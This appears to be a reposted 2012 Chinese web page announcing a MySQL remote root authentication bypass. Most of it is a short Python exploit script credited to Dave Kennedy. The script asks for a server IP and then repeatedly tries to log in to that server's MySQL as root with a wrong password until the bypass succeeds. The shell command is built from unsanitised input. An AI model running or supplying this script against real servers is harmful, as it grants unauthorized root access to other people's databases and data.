2012-6-14 16:32:13 来源:网络转载 浏览:431
MySQL最新漏洞公布:MySQL远程root身份验证绕过漏洞(MySQL Remote Root Authentication Bypass )


# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little. 

# Title: MySQL Remote Root Authentication Bypass 
# Written by: Dave Kennedy (ReL1K) 

# Original advisory here: 
import subprocess 
ipaddr = raw_input("Enter the IP address of the mysql server: ") 

while 1: 
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()